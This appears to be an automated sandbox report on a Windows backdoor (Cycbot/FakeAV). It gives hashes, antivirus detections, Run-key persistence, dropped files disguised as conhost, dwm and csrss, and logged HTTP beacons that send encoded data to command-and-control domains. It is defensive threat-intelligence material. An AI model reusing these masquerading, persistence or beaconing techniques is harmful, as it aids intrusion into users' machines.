Analysis Date: 2015-01-15 15:56:33
MD5: 6750dc94eee2659186fa56628d191a8f
SHA1: 6832c997546213f5297f9b0c38c8b3c0d5256afc

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: af03ef892bf97e435e5f5c52281d3507 sha1: 455c173191b2b08bdb2c0f33e362290bd787acfd size: 114176
Section .tls   md5: f3c75bc75748124dca3f0864b9d6ae13 sha1: 469b8d73c95158272b21f83a26496e709ff58526 size: 1536
Section .data  md5: 22e1a3acfc471cbd7baba2ad89eb8095 sha1: 335d976b66ee9f531df2672ef49a087dc8a52154 size: 65536
Section .reloc md5: d10eb799e58de98637b54c013a97a59d sha1: 1f09876c5ae27057358407a73889a7072910f1cd size: 1024
Timestamp: 2005-11-16 12:22:46
PEhash: d0b580a3bd160ed99c810948ccbbb9fdee6460b8
IMPhash: 953d685d87b2835487bc114d85f5586f
AV 360 Safe ➝ no_virus
AV Ad-Aware ➝ Gen:Heur.Conjar.9
AV Alwil (avast) ➝ Cybota [Trj]
AV Arcabit (arcavir) ➝ Gen:Heur.Conjar.9
AV Authentium ➝ W32/Goolbot.K.gen!Eldorado
AV Avira (antivir) ➝ TR/Crypt.XPACK.Gen
AV BullGuard ➝ Gen:Heur.Conjar.9
AV CA (E-Trust Ino) ➝ Win32/FakeAlert.J!generic
AV CAT (quickheal) ➝ Backdoor.Cycbot.B
AV ClamAV ➝ Win.Trojan.Cycbot-2916
AV Dr. Web ➝ Trojan.DownLoader4.51028
AV Emsisoft ➝ Gen:Heur.Conjar.9
AV Eset (nod32) ➝ Win32/Kryptik.SMY
AV Fortinet ➝ W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot) ➝ W32/Goolbot.K.gen!Eldorado
AV F-Secure ➝ Gen:Heur.Conjar.9
AV Grisoft (avg) ➝ Win32/Cryptor
AV Ikarus ➝ Backdoor.Win32.Cycbot
AV K7 ➝ Backdoor ( 003210941 )
AV Kaspersky ➝ Trojan-Downloader.Win32.KillAV.d
AV MalwareBytes ➝ Backdoor.Bot
AV Mcafee ➝ BackDoor-EXI.gen.s
AV Microsoft Security Essentials ➝ Backdoor:Win32/Cycbot.G
AV MicroWorld (escan) ➝ Gen:Heur.Conjar.9
AV Rising ➝ no_virus
AV Sophos ➝ Mal/FakeAV-IS
AV Symantec ➝ Backdoor.Cycbot!gen5
AV Trend Micro ➝ BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32) ➝ BScope.Trojan.MTA.01556

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: wwwmediaportal.com
Winsock DNS: 127.0.0.1
Winsock DNS: onlinebizdirectory.com
Winsock DNS: coolmediaportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: onlinebizdirectory.com (Type: A) ➝ 184.168.66.121
DNS: zonedg.com (Type: A) ➝ 141.8.225.80
DNS: zonedg.com (Type: A) ➝ 141.8.225.80
DNS: wwwmediaportal.com (Type: A) ➝ 128.199.187.239
DNS: file4exchange.com (Type: A)
DNS: coolmediaportal.com (Type: A)
HTTP GET: http://onlinebizdirectory.com/images/PowerHideBanner.gif?v71=79&tq=gHZutDyMv5rJeTfia9nrmsl6giWz%2BJZbVyA%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNx1Kv975Xlm5G
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
  User-Agent: mozilla/2.0
HTTP GET: http://wwwmediaportal.com/blog/images/3521.jpg?v10=21&tq=gKZEtzyMv5rJqxG1J42pzMffBvEp1ujbwvgS917X65rJqlLfgPiWW1cg
  User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1032 ➝ 184.168.66.121:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 128.199.187.239:80

Raw Pcap
Strings